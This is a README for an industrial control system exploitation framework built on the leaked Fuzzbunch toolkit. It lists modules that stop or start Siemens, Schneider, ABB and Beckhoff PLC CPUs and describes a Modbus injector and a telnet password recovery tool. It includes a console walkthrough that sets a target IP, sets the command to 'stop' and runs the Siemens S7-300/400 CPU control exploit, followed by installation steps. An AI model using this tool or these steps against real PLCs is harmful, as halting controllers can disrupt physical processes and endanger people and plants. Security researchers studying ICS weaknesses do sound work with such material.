ISF(Industrial Security Exploitation Framework) is a exploitation framework based on Python. It's based on NSA Equation Group Fuzzbunch toolkit which is realsed by Shadow Broker. It's developed by the ICSMASTER Security Team. Please use them only for researching purposes.
Read this in other languages: English, 简体中文
- Python 2.7
- Works on Linux, Windows, Mac OSX, BSD
Name | Desc |
Schneider_CPU_Command | Control Schneider PLC CPU start or stop |
Siemens_300_400_CPU_Control | Control Siemens PLC-300 and PLC-400 CPU start or stop |
Siemens_1200_CPU_Control | Control Siemens PLC-1200 CPU start or stop |
Modbus_PLC_Injecter | Modbus PLC injecter tools |
plcscan | Modbus and S7 PLC scanner tools |
lantronix_telnet_password | Recover lantronix telnet password |
Siemens_1200_Control | Control Siemens PLC |
C:\Users\w.hhh>python D:/isf/isf/
[*] Loading Plugins
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+ - - - - - + [ Version 1.1.1 ] + - - - - - +
+ - - - - - + [ 6 Touches ] + - - - - - +
+ - - - - - + [ 10 Exploits ] + - - - - - +
+ - - - - - + [ 15 Payloads ] + - - - - - +
+ - - - - - + [ 2 Specials ] + - - - - - +
+ - - - - - + [ MADE BY ICSMASTER. HTTP://ICSMASTER.COM ] + - - - - - +
Display module:
isf > show
Plugin Categories
Category Active Plugin
-------- -------------
Exploit None
Payload None
Special None
Touch None
isf > show Exploit
Plugin Category: Exploit
Name Version
---- -------
ABB_CPU_Command 1.1.0
Beckhoff_CX9020_CPU_Control 1.1.0
Schneider_CPU_Command 1.1.0
Siemens_1200_CPU_Control 1.1.0
Siemens_300_400_CPU_Control 1.1.0
isf >
Pick the module:
isf > use Siemens_300_400_CPU_Control
[!] Entering Plugin Context :: Siemens_300_400_CPU_Control
[*] Applying Global Variables
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Siemens_300_400_CPU_Control
Module: Siemens_300_400_CPU_Control
Name Value
---- -----
TargetPort 102
Slot 3
Command stop
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
Display information about exploit:
isf Exploit (Siemens_300_400_CPU_Control) > info
Name: Siemens_300_400_CPU_Control
Version: 1.1.0
Author: w3h
Type: Exploit
Name Value Description
---- ----- -----------
TargetIp Target IP Address
TargetPort 102 Target Port
Slot 3 The number of slot
Command stop The control command of cpu
isf Exploit (Siemens_300_400_CPU_Control) > set TargetIp
[+] Set TargetIp =>
Execute the module:
isf Exploit (Siemens_300_400_CPU_Control) > run
[!] Preparing to Execute Siemens_300_400_CPU_Control
Module: Siemens_300_400_CPU_Control
Name Value
---- -----
TargetPort 102
Slot 3
Command stop
[?] Execute Plugin? [Yes] :
- gnureadline (OSX only)
- pywin32 (Windows only)
git clone
cd isf
sudo easy_install pip
sudo pip install -r requirements.txt
sudo apt-get install python-dev python-pip libncurses5-dev git
git clone
cd isf
sudo pip install -r requirements.txt
sudo yum install python-devel python2-pip ncurses-devel git
git clone
cd isf
pip install -r requirements.txt
- install pywin32 (./dependencies/pywin32-221.win32-py2.7.exe)
- download isf (
- start (python